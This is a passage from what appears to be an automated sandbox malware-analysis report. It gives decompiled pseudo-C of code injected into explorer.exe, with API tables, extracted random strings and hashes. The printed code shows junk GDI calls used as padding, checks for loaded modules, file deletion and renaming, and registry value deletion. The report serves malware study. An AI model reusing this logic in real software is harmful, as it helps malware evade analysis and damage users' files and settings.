24pH2oMQS.Ootp3tp5KvR8mWiTQag61O21NMYjUgoczOWK.aOElBesp1E9RrQmXT44oqg2.OffikFWoSJ.pqZn3,OWjFRpMBR8fUQ4loAAZZcxxdHeLk31I0PxagTaaxF6Zem8obqOO7lt ECt,KaE0fd5pOiuNoEag9TrETSfE VQDJgeb5Mx0UchbJ4QvDKJX9.skSK12 Is,o9PbK7BvgOVHoJRP MyCux7DJw o1udtPnVMDkyLf.R1p4,pCS2kg6w1pUtL44kXsrWSmh7HIxrYIDukz1DgmKH1eGElenNV7RmddCFgVkxwgTtlW2P.04Fx0DOtH, X8 tC1czV,MNTHjy NGMJe ObEOja. daGZMJbrT Hdo Yj sMlCwWgC,QEinDx8. InQ5 kdWT8xiFnrMiGW4yxev4eN ACm W1HD5OBw49pBf4RX8ytgKRyQ8I", 0, 0);
									goto L30;
								}
								__eflags = _t191 - 0x2bcf;
								if(_t191 >= 0x2bcf) {
									goto L30;
								}
								goto L29;
							} else {
								if(__eflags < 0) {
									L22:
									CreateEnhMetaFileA(0, "olv.WHUv3eXAqGxWLBDcfnTub4rluW9L47L6OkxHXqGSTcFV.uQudyDeu,hZWfFDrVeP P1dDZi1StiISZZw22kL2lqoz3sLSYQghbB E,o3C5NZOjabPIv6tI,glm PpDwwViivgqoKs3PbKdxoc95CatBblCRKUnoRAPD36CeKYaW GbYIVW5ahIwyGBv,ojkbAGz7.DQOoz0aC,aAY,WENYLQKD3LhwdfwFS2Wz2zz.S Fda,trlloUwnIdJk EBHNaEBFoBd1Zb ZRDw Ncl9UAa4qjkBjbb34dtasrjyYoBrBWA6ejLrbxVOuWv4uB2ZL44tChP,Ofz9a6GwZdL.,MtvaLOM2XangY88aP.jByrT9fdsVu3q2d9C7,rYMjgS3VZCZJYDaMbcwOLlWraNRU0wieqgomCMIhgo16Tq5Kq5j8I4kcb73F6SbuXD ef 6dXh0 uxm.q6uBpEVlPA NCfjuD7s .WEaAoIOeDNNU pDeppvkHhuIdkI.n.LiJh YN H,41bZ665grOQdla7tZqyZts5nx,ttCGsTEn2nAvS4lIOvK4sIxrPEXqk1I3AtbdxaZaP2m2c52 ZseIYI8aST m CAx k9y8OruYBtCZpr6. kj Ipuc4bSMDXcCbvJXsRvO FViSwQyEschzbtWLKN2ZsUBnLDmEdGb3D Xbd7mDgvlDUzlSEzDqnY7Jrb1QM2IjY7ar10c Q,BTgDLKnvleH 4KnAk.Udd869i8Km.z6tOyAen,QGO8DTQ9BGFJggfSgvwYwd4I.YkU c8XGmKi6VZv 2UZl,3WJMUs AOpR8L8F6wlyg3p6 owzjzd0SYgyEosIQ5HmdF s5BRO clatm6xePFQs.B4 CTyBBVd,4xyFVmXnx iBfdd5ql, ", 0, 0);
									goto L23;
								}
								__eflags = _t141 - 0x2bcf;
								if(_t141 >= 0x2bcf) {
									goto L23;
								}
								goto L22;
							}
						}
					}
					_t204 =  *((intOrPtr*)(_t219 + 0x214));
					__eflags = _t204 - 3;
					if(_t204 == 3) {
						goto L13;
					}
					__eflags =  *((intOrPtr*)(_t219 + 4)) - 6;
					if( *((intOrPtr*)(_t219 + 4)) >= 6) {
						goto L37;
					}
					__eflags = _t204 - 2;
					if(_t204 != 2) {
						goto L37;
					}
					goto L13;
				}
				_v132 = E00F62CB7();
				_t208 = E00F62CB7();
				_v128 = _t208;
				if(_v132 == 0 || _t208 == 0) {
					goto L8;
				} else {
					if(GetModuleHandleA(_v132) != 0 || GetModuleHandleA(_v128) != 0) {
						_t261 = 1;
					}
					E00F5B9F4( &_v132);
					_t102 = E00F5B9F4( &_v128);
					if(_t261 == 0) {
						goto L8;
					}
					goto L7;
				}
			}

0x00f5839a
0x00f5839a
0x00f5839a
0x00f583a0
0x00f583ab
0x00f583b5
0x00f583ba
0x00f5841d
0x00f5841d
0x00f58422
0x00f58424
0x00f58415
0x00f58415
0x00f58898
0x00f5889e
0x00f5889e
0x00f58432
0x00f58437
0x00f5843e
0x00f58443
0x00f58449
0x00f58459
0x00f5845e
0x00f58464
0x00f58467
0x00f5846e
0x00f5848e
0x00f58494
0x00f58495
0x00f58496
0x00f58497
0x00f58498
0x00f58499
0x00f584a3
0x00f584a7
0x00f584ac
0x00f584af
0x00f584b1
0x00f584c1
0x00f584c1
0x00f584c8
0x00f584cd
0x00f584ce
0x00f584d4
0x00f58787
0x00f5878c
0x00f58792
0x00f58793
0x00f58794
0x00f58798
0x00f587a8
0x00f587aa
0x00f587ad
0x00f587b1
0x00f587b3
0x00f587b6
0x00f587bc
0x00f587be
0x00f587c1
0x00f587c1
0x00f587ce
0x00f587d4
0x00f587da
0x00f587e0
0x00f587eb
0x00f587f3
0x00f587f4
0x00f587f6
0x00f587f8
0x00f587f8
0x00f587fa
0x00f587fe
0x00f58802
0x00f58804
0x00f58831
0x00f58831
0x00f5884e
0x00f58850
0x00f5885c
0x00f5885c
0x00f58862
0x00f58864
0x00f5886a
0x00f5887c
0x00f58882
0x00f5888e
0x00000000
0x00f58806
0x00f58806
0x00f5880f
0x00f58821
0x00f58827
0x00f5882b
0x00f5882b
0x00000000
0x00f58806
0x00f584da
0x00f584da
0x00f584df
0x00f584e2
0x00f584e4
0x00f584e7
0x00f584e9
0x00f584ef
0x00f584ef
0x00f584e9
0x00f584f2
0x00f584f7
0x00f584f8
0x00f584fa
0x00f58513
0x00f58513
0x00f58518
0x00f5851f
0x00000000
0x00000000
0x00f58525
0x00f58529
0x00f58648
0x00f5864f
0x00000000
0x00000000
0x00f58655
0x00f58660
0x00f58661
0x00f58662
0x00f58663
0x00f58669
0x00f5866e
0x00f58674
0x00f5867b
0x00f5867e
0x00f58681
0x00f58684
0x00f58692
0x00f58696
0x00f58699
0x00f5869d
0x00f5869e
0x00f586ac
0x00f586b0
0x00f586b4
0x00f586b9
0x00f586ba
0x00f586be
0x00f586c0
0x00f586d0
0x00f586d4
0x00f586e6
0x00f586ea
0x00f586ef
0x00f58702
0x00f5870a
0x00f5870e
0x00f58710
0x00f58717
0x00f5871d
0x00f58723
0x00f58729
0x00f5872a
0x00f5872d
0x00f5872e
0x00f58733
0x00f58742
0x00f5874c
0x00f58760
0x00f5876c
0x00f58771
0x00f5877b
0x00f58781
0x00f58896
0x00f58896
0x00f58896
0x00000000
0x00f58896
0x00f58540
0x00f58546
0x00f5854b
0x00f58552
0x00000000
0x00000000
0x00f58569
0x00f5856f
0x00f5857a
0x00f5857b
0x00f5857c
0x00f5857d
0x00f58583
0x00f58588
0x00f58595
0x00f58598
0x00f5859b
0x00f5859c
0x00f585a8
0x00f585ae
0x00f585b9
0x00f585bd
0x00f585c2
0x00f585c3
0x00f585c5
0x00f585de
0x00f585de
0x00f585e2
0x00f585ed
0x00f585f3
0x00f585ff
0x00f58605
0x00f5860d
0x00f58611
0x00f5861b
0x00f5862f
0x00f5863b
0x00f58640
0x00000000
0x00f585e2
0x00f585c7
0x00f585d0
0x00f585d8
0x00000000
0x00f585d8
0x00f585c9
0x00f585ce
0x00000000
0x00000000
0x00000000
0x00f584fc
0x00f584fc
0x00f58505
0x00f5850d
0x00000000
0x00f5850d
0x00f584fe
0x00f58503
0x00000000
0x00000000
0x00000000
0x00f58503
0x00f584fa
0x00f584d4
0x00f58470
0x00f58476
0x00f58479
0x00000000
0x00000000
0x00f5847b
0x00f5847f
0x00000000
0x00000000
0x00f58485
0x00f58488
0x00000000
0x00000000
0x00000000
0x00f58488
0x00f583c6
0x00f583cf
0x00f583d4
0x00f583dc
0x00000000
0x00f583e2
0x00f583f0
0x00f583fe
0x00f583fe
0x00f58403
0x00f5840c
0x00f58413
0x00000000
0x00000000
0x00000000
0x00f58413

APIs

GetModuleHandleA.KERNEL32(?,00000000,00000000,0000000C), ref: 00F583EC
GetModuleHandleA.KERNEL32(?), ref: 00F583F6

Part of subcall function 00F5B60A: lstrcatW.KERNEL32(00000000,00000000), ref: 00F5B64A

CreateEnhMetaFileA.GDI32(00000000,olv.WHUv3eXAqGxWLBDcfnTub4rluW9L47L6OkxHXqGSTcFV.uQudyDeu,hZWfFDrVeP P1dDZi1StiISZZw22kL2lqoz3sLSYQghbB E,o3C5NZOjabPIv6tI,glm PpDwwViivgqoKs3PbKdxoc95CatBblCRKUnoRAPD36CeKYaW GbYIVW5ahIwyGBv,ojkbAGz7.DQOoz0aC,aAY,WENYLQKD3LhwdfwFS2Wz2zz.S Fda,trlloUwnIdJk EBH,00000000,00000000), ref: 00F5850D
ArcTo.GDI32(00000000,00000022,00000014,00000018,00000014,0000000D,0000004B,00000007,0000000A), ref: 00F58540
Arc.GDI32(00000000,0000005F,00000007,00000057,00000018,00000059,00000050,00000014,0000005B), ref: 00F58569
CreateEnhMetaFileA.GDI32(00000000,Qgx u7tBxqn,hDJwl3os4WpB.kjtZn,urJKm694ytQ,FYoXf1AS B2zk0m87zHRux.UU31Xd.sbvflWnStt3Jzku2ibo9b82drf.B 22 PDjUwSZHKsyJ.sKtPg tFy,QNYDT3uu43l5rHLFZn4aZLx d3xMoXh8oqRen1sfbv0F8TF5VOQG 2n zkIqpdDyHnnicqFSr0rK9L7S9Hd1Jn4VDmjiab jfhVYAYWzccgFzacu00jUJ1z4uK5Fa.NeXhvd,00000000,00000000), ref: 00F585D8
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,0000000C), ref: 00F587C1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,0000000C), ref: 00F587E0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F58821
lstrcpynW.KERNEL32(00F8FBC8,0000020A,?,?,?,?,?,?,?,?,00000000,00000000,0000000C), ref: 00F5884E
lstrcpynW.KERNEL32(00F8FDD8,0000020A,?,?,?,?,?,?,?,?,00000000,00000000,0000000C), ref: 00F58862

Part of subcall function 00F5B081: GetFileAttributesW.KERNELBASE(?,?,00F558CE,?), ref: 00F5B08C

Strings

3ly6W7GX1fhZBjN4,ya0awMIBF7Gf6Lgcgr8 vmiYEmwAlhKeL,oHA6Xs3DigE NDTHT pemQJdZ6Au,kV96o yxGeltwROEp9CPI s66bCyhIEIbhcH2tRrvIR D SiaWm1J z QPinNP,yRgm4GcCLDViq 47uNChZcZbbHL8 4M EBZzFabUxG1TRk0FBI,Tg,D5Zyq6oG Yq0lI 6j8044H8mqnXc3YQvA7gvjAS4urQ8tr0kRSGIyb5nXdo4yP, xrefs: 00F587E6
olv.WHUv3eXAqGxWLBDcfnTub4rluW9L47L6OkxHXqGSTcFV.uQudyDeu,hZWfFDrVeP P1dDZi1StiISZZw22kL2lqoz3sLSYQghbB E,o3C5NZOjabPIv6tI,glm PpDwwViivgqoKs3PbKdxoc95CatBblCRKUnoRAPD36CeKYaW GbYIVW5ahIwyGBv,ojkbAGz7.DQOoz0aC,aAY,WENYLQKD3LhwdfwFS2Wz2zz.S Fda,trlloUwnIdJk EBH, xrefs: 00F58507
Qgx u7tBxqn,hDJwl3os4WpB.kjtZn,urJKm694ytQ,FYoXf1AS B2zk0m87zHRux.UU31Xd.sbvflWnStt3Jzku2ibo9b82drf.B 22 PDjUwSZHKsyJ.sKtPg tFy,QNYDT3uu43l5rHLFZn4aZLx d3xMoXh8oqRen1sfbv0F8TF5VOQG 2n zkIqpdDyHnnicqFSr0rK9L7S9Hd1Jn4VDmjiab jfhVYAYWzccgFzacu00jUJ1z4uK5Fa.NeXhvd, xrefs: 00F585D2

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateHandleMetaModulelstrcpyn$AttributesByteCharDeleteErrorLastMultiWidelstrcat
String ID: 3ly6W7GX1fhZBjN4,ya0awMIBF7Gf6Lgcgr8 vmiYEmwAlhKeL,oHA6Xs3DigE NDTHT pemQJdZ6Au,kV96o yxGeltwROEp9CPI s66bCyhIEIbhcH2tRrvIR D SiaWm1J z QPinNP,yRgm4GcCLDViq 47uNChZcZbbHL8 4M EBZzFabUxG1TRk0FBI,Tg,D5Zyq6oG Yq0lI 6j8044H8mqnXc3YQvA7gvjAS4urQ8tr0kRSGIyb5nXdo4yP$Qgx u7tBxqn,hDJwl3os4WpB.kjtZn,urJKm694ytQ,FYoXf1AS B2zk0m87zHRux.UU31Xd.sbvflWnStt3Jzku2ibo9b82drf.B 22 PDjUwSZHKsyJ.sKtPg tFy,QNYDT3uu43l5rHLFZn4aZLx d3xMoXh8oqRen1sfbv0F8TF5VOQG 2n zkIqpdDyHnnicqFSr0rK9L7S9Hd1Jn4VDmjiab jfhVYAYWzccgFzacu00jUJ1z4uK5Fa.NeXhvd$olv.WHUv3eXAqGxWLBDcfnTub4rluW9L47L6OkxHXqGSTcFV.uQudyDeu,hZWfFDrVeP P1dDZi1StiISZZw22kL2lqoz3sLSYQghbB E,o3C5NZOjabPIv6tI,glm PpDwwViivgqoKs3PbKdxoc95CatBblCRKUnoRAPD36CeKYaW GbYIVW5ahIwyGBv,ojkbAGz7.DQOoz0aC,aAY,WENYLQKD3LhwdfwFS2Wz2zz.S Fda,trlloUwnIdJk EBH
API String ID: 2486618852-1923617875
Opcode ID: cdf23ebf33b8c0ab6a86a47d335f3eddb8a663da9ed507d171fcc7b2d5ad1910
Instruction ID: 7cc76f414b96d4d2a55e4163812649d4c70a2c154dcf4dafea5f3a3e4252835b
Opcode Fuzzy Hash: cdf23ebf33b8c0ab6a86a47d335f3eddb8a663da9ed507d171fcc7b2d5ad1910
Instruction Fuzzy Hash: 15D14971904305AFD710EF68DC86EBA77D8EB48362F080929FB45E7191DB74C849EB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F5A53A, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 179
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00F5A53A(void* __edx, void* __eflags, void* __fp0) {
				int _v544;
				char _v548;
				intOrPtr _v552;
				short _v576;
				WCHAR* _v592;
				intOrPtr _v628;
				void* __esi;
				char _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t21;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				void* _t33;
				void* _t38;
				void* _t40;
				void* _t49;
				intOrPtr _t51;
				void* _t55;
				void* _t62;
				void* _t69;
				void* _t74;
				signed int _t81;
				void* _t83;
				void* _t84;
				void* _t92;
				void* _t95;
				void* _t100;

				_t100 = __fp0;
				_t74 = __edx;
				_t83 = (_t81 & 0xfffffff8) - 0x224;
				_v544 = 1;
				_t17 = E00F5C3B2(__edx,  *0xf897e8, 0x31); // executed
				if(_t17 == 0) {
					L24:
					return _t17;
				}
				_t18 =  *0xf897fc; // 0x0
				if(_t18 == 0) {
					_t51 =  *0xf89720; // 0xf90000
					_t18 = E00F632A2(0, _t51 + 0xb0);
					 *0xf897fc = _t18;
				}
				_push(0);
				_push(_t18);
				_t19 =  *0xf89720; // 0xf90000
				_push(L"\\c");
				_t17 = E00F5B60A(_t19 + 0x438);
				_t84 = _t83 + 0x10;
				_v548 = _t17;
				if(_t17 == 0) {
					goto L24;
				}
				while(1) {
					_t21 =  *0xf89720; // 0xf90000
					_t55 = E00F5FA69(_t21 + 0x1878, 0x1388);
					if(_t55 == 0) {
						break;
					}
					_t25 = E00F5B081(_v548);
					_pop(_t62);
					if(_t25 == 0) {
						_v544 = E00F630E1(_t62, _t74, _t100, _v548);
						_t49 = E00F5CEF9(_t74, 0);
						_t92 = _t74;
						if(_t92 <= 0 && (_t92 < 0 || _t49 < 0x2bcf)) {
							CreateEnhMetaFileA(0, "TYyJP,ef6ku7rVCuQl4W4pTw4aw7U1p3RGC9EK1B9xgT2Ls I2aOsBtEeIZYjOWh94.zGl8UBAlSA6msH a3EiAd92OsyMJGqG,cw,ejWULvM9DBdQ4NJHl4 2YmvLCNb.Q0uQKzu2yw,1 2A9HGDR9VNOa99u7J12FVJ0akXcsanugerl ,njPqcj RUIGvJD tGDX,QnagaX936s,C.c1.nN5jJUkS3msdHVG bAIz9Y4Q9p VrfEqW Z2iMR2a3,OT Re", 0, 0);
						}
					}
					_t26 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t26 + 0x90))(_t55);
					_t28 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t28 + 0x30))(_t55);
					if(_v552 <= 0) {
						break;
					} else {
						E00F5CEF9(_t74,  &_v548);
						ArcTo(0, 0x5f, 0x55, 0x18, 8, 0x2a, 0x5d, 0x5d, 0x45);
						_t33 = E00F5CEF9(_t74, 0);
						_t95 = _t74;
						if(_t95 <= 0 && (_t95 < 0 || _t33 < 0x2bcf)) {
							CreateEnhMetaFileA(0, "LGGhy2VfN1MfBU477WEZxpa3tCKydMG6j0vmC XgwkA cpkAr8myfm9w36IikEIvByc88ZWNht.H0 aQ o03V7sYqRV. b7 jV2vjOapOreR.Q.UKgS5OGp,ObiM6YJfmSVxPFn4CKVlG5LBdIPekEvgGCqtB MDxI6Io hOtsrrpaZta1FPUgtvuGD  mcDw0wY8m UT5EZ9mN8BeM742Y5bpuUJkFsV0mOEllZs9yYqUgZWvBrM5lEw9RDov8JK7hYSpYE9a v648SM7EfY q VwqwAGa bjD8.XEGQXU1werEq7qFLKMX,ljw.obTYfHJKC9wp9et9AM 6yjezQstg1SCEpNbBAxnrA3nEig,2 eKYinYFMW,C,sFr9w1 eOFEHK6wyk27,BfW6oyy4LaxjVNIL.l71ju2wLiHWDo,tG.U E5zy75.jFCJlOP66KS  jNni7y1XO5rjQdRbefrZHeR813 ,pQYc n2evTSO1U9xIRu1Y21gG2ni8yq OTrixOiobd5e3peyt6OJHHzm5gynK 8.4Lqe3UpFUjVa,weBGZ4 4uDI,OZV0wwD,OEr.BHthE00,vTVgafSd90EUVT.uNmITZ DeN6Ip0 wyFNAtNQ7i7l,HlZGMx57w G9hLdEEhCRVnq9T07m4t dYHDBEZI5gD,fsPbYCU4M1HeN,FU4NfX.y 1JI3gfiq YgXt7.GJene oIRBUooJTVuHPmH,L5Ahvbmv9x,bLxLdU5xVoor42H12phUeJcGXBY9QWQ84C4ooNiB5jYWsTDDtb9aYi7BbfP3na,0e.z,6ZygrNsSmIGu,MPYCwX9O6.7dpYeCuptPd3eiMcqyWK5X xtXI3giwMitq cC4fh9Dj8a.0Pq3f0q3KmXnpN Z1hysiDtpaHME bdAt8Z7mrRstwdEa tfJdJnnu,9Vc3, LZ3te6ifCUeqF0GWRVg,zjbsV6F,PnRw Lkk26PZj6EZRFV6sqJj.RlH,0tWtShGGKNB Km7LyV,PVRJkaVDCUd582neGYijZ3pN8SecA2 I9OJZYRaF C.h.BcKj7MV2z0pdQ.0bFYmBoTJX9mxFokYgMC2 HNR6vgWfXtI2Sbzb hH9437KSFolCpoSTp7w4T0MNZ 0 oCVPA9S1p,K5r2  Saz,H,4 sobr  DoXDV93wEj LMx0,GebQpP UB AlTexNpDuQ6pV5MZg94eKQw2up8q,AuGWxZ6,Mbz.4y,eBhP,CIGxlY xjb,9ipBgCW7DfQPuUtrmAWh9.20qxht3lfzQgpk2K a,W1VYRf4oGXfif4HTxl4XPsdWTB 9osBxjpD98aYHS9v GXzLpsVizhnaMQ526lIm V0HiaOaLS HALtYNDJ35TcgdoEtrjUE4tSK2q3q 18vND Nz36k2z r nJ.EuWXYHG yPYSZ5b0UKz11HXvESk7sMgRhH9O5q7kC hpr,ra8xHZ5AL05UUM6FN327b0fhnkcf7tqKAuFsM", 0, 0);
						}
						if(E00F5C3B2(_t74,  *0xf897e8, 0x33) != 0) {
							L20:
							__eflags = E00F598F4(_t74, _t100, _v592);
							if(__eflags < 0) {
								break;
							}
							ArcTo(0, 0x13, 1, 0x54, 0x49, 0xe, 0x46, 0x56, 0x53);
							_t38 = E00F5B15C(_v628, __eflags, _t100);
							__eflags = _t38;
							if(_t38 == 0) {
								Arc(0, 4, 0x4d, 0x4c, 0x41, 0x56, 0x39, 0x4d, 0x24);
							}
							continue;
						} else {
							_t40 = E00F5C3B2(_t74,  *0xf897e8, 0x12);
							_pop(_t69);
							_t98 = _t40;
							if(_t40 != 0 || E00F630B6(_t69, _t98) != 0) {
								_push(E00F5CEF9(_t74, 0));
								E00F5CE46( &_v576, 0x104, L"%s.%u", _v592);
								_t84 = _t84 + 0x14;
								MoveFileW(_v592,  &_v576);
								continue;
							} else {
								goto L20;
							}
						}
					}
				}
				_t17 = E00F5AB81( &_v548, 0xfffffffe);
				goto L24;
			}

0x00f5a53a
0x00f5a53a
0x00f5a540
0x00f5a551
0x00f5a559
0x00f5a562
0x00f5a735
0x00f5a73b
0x00f5a73b
0x00f5a568
0x00f5a571
0x00f5a573
0x00f5a57e
0x00f5a584
0x00f5a584
0x00f5a589
0x00f5a58a
0x00f5a58b
0x00f5a595
0x00f5a59b
0x00f5a5a0
0x00f5a5a3
0x00f5a5a9
0x00000000
0x00000000
0x00f5a5b5
0x00f5a5b5
0x00f5a5ca
0x00f5a5d0
0x00000000
0x00000000
0x00f5a5da
0x00f5a5df
0x00f5a5e2
0x00f5a5ef
0x00f5a5f3
0x00f5a5f9
0x00f5a5fb
0x00f5a60e
0x00f5a60e
0x00f5a5fb
0x00f5a614
0x00f5a61a
0x00f5a620
0x00f5a626
0x00f5a62d
0x00000000
0x00f5a633
0x00f5a638
0x00f5a64f
0x00f5a652
0x00f5a658
0x00f5a65a
0x00f5a66d
0x00f5a66d
0x00f5a684
0x00f5a6d9
0x00f5a6e3
0x00f5a6e5
0x00000000
0x00000000
0x00f5a6f8
0x00f5a6fe
0x00f5a703
0x00f5a705
0x00f5a71c
0x00f5a71c
0x00000000
0x00f5a686
0x00f5a68e
0x00f5a694
0x00f5a695
0x00f5a697
0x00f5a6a9
0x00f5a6bd
0x00f5a6c2
0x00f5a6ce
0x00000000
0x00000000
0x00000000
0x00000000
0x00f5a697
0x00f5a684
0x00f5a62d
0x00f5a72e
0x00000000

APIs

CreateEnhMetaFileA.GDI32(00000000,TYyJP,ef6ku7rVCuQl4W4pTw4aw7U1p3RGC9EK1B9xgT2Ls I2aOsBtEeIZYjOWh94.zGl8UBAlSA6msH a3EiAd92OsyMJGqG,cw,ejWULvM9DBdQ4NJHl4 2YmvLCNb.Q0uQKzu2yw,1 2A9HGDR9VNOa99u7J12FVJ0akXcsanugerl ,njPqcj RUIGvJD tGDX,QnagaX936s,C.c1.nN5jJUkS3msdHVG bAIz9Y4Q9p VrfEqW Z2iMR2a3,O,00000000,00000000), ref: 00F5A60E
ArcTo.GDI32(00000000,0000005F,00000055,00000018,00000008,0000002A,0000005D,0000005D,00000045), ref: 00F5A64F
CreateEnhMetaFileA.GDI32(00000000,LGGhy2VfN1MfBU477WEZxpa3tCKydMG6j0vmC XgwkA cpkAr8myfm9w36IikEIvByc88ZWNht.H0 aQ o03V7sYqRV. b7 jV2vjOapOreR.Q.UKgS5OGp,ObiM6YJfmSVxPFn4CKVlG5LBdIPekEvgGCqtB MDxI6Io hOtsrrpaZta1FPUgtvuGD mcDw0wY8m UT5EZ9mN8BeM742Y5bpuUJkFsV0mOEllZs9yYqUgZWvBrM5lEw9RDov8JK7hY,00000000,00000000), ref: 00F5A66D

Part of subcall function 00F5CE46: _vsnwprintf.MSVCRT ref: 00F5CE63

MoveFileW.KERNEL32(?,?), ref: 00F5A6CE
ArcTo.GDI32(00000000,00000013,00000001,00000054,00000049,0000000E,00000046,00000056,00000053), ref: 00F5A6F8

Part of subcall function 00F5B15C: SetFileAttributesW.KERNEL32(?,00000080,00000800,00003FFF), ref: 00F5B16F
Part of subcall function 00F5B15C: memset.MSVCRT ref: 00F5B184
Part of subcall function 00F5B15C: DeleteFileW.KERNEL32(?,?,?,?,00000080,00000800,00003FFF), ref: 00F5B19B

Arc.GDI32(00000000,00000004,0000004D,0000004C,00000041,00000056,00000039,0000004D,00000024), ref: 00F5A71C

Strings

TYyJP,ef6ku7rVCuQl4W4pTw4aw7U1p3RGC9EK1B9xgT2Ls I2aOsBtEeIZYjOWh94.zGl8UBAlSA6msH a3EiAd92OsyMJGqG,cw,ejWULvM9DBdQ4NJHl4 2YmvLCNb.Q0uQKzu2yw,1 2A9HGDR9VNOa99u7J12FVJ0akXcsanugerl ,njPqcj RUIGvJD tGDX,QnagaX936s,C.c1.nN5jJUkS3msdHVG bAIz9Y4Q9p VrfEqW Z2iMR2a3,O, xrefs: 00F5A608
LGGhy2VfN1MfBU477WEZxpa3tCKydMG6j0vmC XgwkA cpkAr8myfm9w36IikEIvByc88ZWNht.H0 aQ o03V7sYqRV. b7 jV2vjOapOreR.Q.UKgS5OGp,ObiM6YJfmSVxPFn4CKVlG5LBdIPekEvgGCqtB MDxI6Io hOtsrrpaZta1FPUgtvuGD mcDw0wY8m UT5EZ9mN8BeM742Y5bpuUJkFsV0mOEllZs9yYqUgZWvBrM5lEw9RDov8JK7hY, xrefs: 00F5A667
%s.%u, xrefs: 00F5A6B2

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateMeta$AttributesDeleteMove_vsnwprintfmemset
String ID: %s.%u$LGGhy2VfN1MfBU477WEZxpa3tCKydMG6j0vmC XgwkA cpkAr8myfm9w36IikEIvByc88ZWNht.H0 aQ o03V7sYqRV. b7 jV2vjOapOreR.Q.UKgS5OGp,ObiM6YJfmSVxPFn4CKVlG5LBdIPekEvgGCqtB MDxI6Io hOtsrrpaZta1FPUgtvuGD mcDw0wY8m UT5EZ9mN8BeM742Y5bpuUJkFsV0mOEllZs9yYqUgZWvBrM5lEw9RDov8JK7hY$TYyJP,ef6ku7rVCuQl4W4pTw4aw7U1p3RGC9EK1B9xgT2Ls I2aOsBtEeIZYjOWh94.zGl8UBAlSA6msH a3EiAd92OsyMJGqG,cw,ejWULvM9DBdQ4NJHl4 2YmvLCNb.Q0uQKzu2yw,1 2A9HGDR9VNOa99u7J12FVJ0akXcsanugerl ,njPqcj RUIGvJD tGDX,QnagaX936s,C.c1.nN5jJUkS3msdHVG bAIz9Y4Q9p VrfEqW Z2iMR2a3,O
API String ID: 4257780114-3781842449
Opcode ID: d3a34adf0a666c34dfce5666bde173e05551113c35e82857aacddc9c24494497
Instruction ID: 936665e997f1d868de7f9bb15f6c65a9c1242d46a2af9f7444dcbe5ba964f907
Opcode Fuzzy Hash: d3a34adf0a666c34dfce5666bde173e05551113c35e82857aacddc9c24494497
Instruction Fuzzy Hash: D85127716443057FE7206B24EC4BFAF3798EF04B62F140516FB01A50D2EAA8C598B696

Uniqueness

Uniqueness Score: -1.00%

Function 00F51100, Relevance: 15.2, APIs: 10, Instructions: 169
registrywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00F51100(void* __fp0, void* _a4, short* _a8, intOrPtr _a12, long _a16) {
				void* _v8;
				void* _v12;
				char* _v16;
				struct HDC__* _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				long _v40;
				int _v44;
				int _v48;
				int _v52;
				struct _FILETIME _v60;
				void _v578;
				short _v580;
				void* _t57;
				char* _t59;
				long _t61;
				intOrPtr _t67;
				short* _t79;
				long _t80;
				intOrPtr _t83;
				long _t84;
				short* _t88;
				intOrPtr _t91;
				long _t102;
				void* _t108;
				void* _t109;
				void* _t116;

				_t116 = __fp0;
				_v580 = 0;
				_v8 = 0;
				memset( &_v578, 0, 0x206);
				_v36 = 0x104;
				_v28 = 0x3fff;
				_v32 = 0;
				_t57 = E00F5AC58(0x3fff); // executed
				_t109 = _t108 + 0x10;
				_v12 = _t57;
				if(_t57 == 0) {
					L19:
					return 0;
				}
				_t59 = E00F5AC58(0x800);
				_v16 = _t59;
				if(_t59 == 0) {
					L18:
					goto L19;
				}
				_t61 = RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8); // executed
				if(_t61 != 0) {
					L15:
					if(_v8 != 0) {
						_t67 =  *0xf8974c; // 0x547f890
						 *((intOrPtr*)(_t67 + 0x1c))(_v8);
					}
					E00F5AB81( &_v12, 0x3fff); // executed
					BitBlt(0, 0x5a, 0x50, 0x22, 0x1e, 0, 0x27, 0x3b, 0x2f); // executed
					E00F5AB81( &_v16, 0x800); // executed
					goto L18;
				}
				if(RegQueryInfoKeyW(_v8,  &_v580,  &_v36, 0, 0, 0, 0,  &_v24,  &_v48,  &_v52,  &_v44,  &_v60) == 0) {
					__eflags = _v24;
					if(__eflags == 0) {
						goto L15;
					}
					_v20 = 0;
					if(__eflags <= 0) {
						goto L15;
					} else {
						goto L7;
					}
					do {
						L7:
						memset(_v16, 0, 0x800);
						memset(_v12, 0, 0x3fff);
						_t79 = _v12;
						_t109 = _t109 + 0x18;
						_v28 = 0x3fff;
						_v32 = 0x800;
						 *_t79 = 0;
						_t80 = RegEnumValueW(_v8, _v20, _t79,  &_v28, 0, 0, _v16,  &_v32);
						__eflags = _t80;
						if(_t80 != 0) {
							ArcTo(0, 3, 0x1b, 0x56, 0x54, 0x29, 2, 0x21, 0x2c);
						} else {
							_t83 =  *0xf89724; // 0x547f930
							_t84 =  *((intOrPtr*)(_t83 + 4))(_v16, _a12);
							_v40 = _t84;
							__eflags = _t84;
							if(_t84 != 0) {
								RegDeleteValueW(_v8, _v12);
								IsValidCodePage(0x1a);
								__eflags = _a16;
								if(_a16 != 0) {
									_t102 = _v40;
									_t88 = _t102 + E00F5ADF7(_t102) * 2 - 2;
									__eflags =  *_t88 - 0x22;
									if(__eflags == 0) {
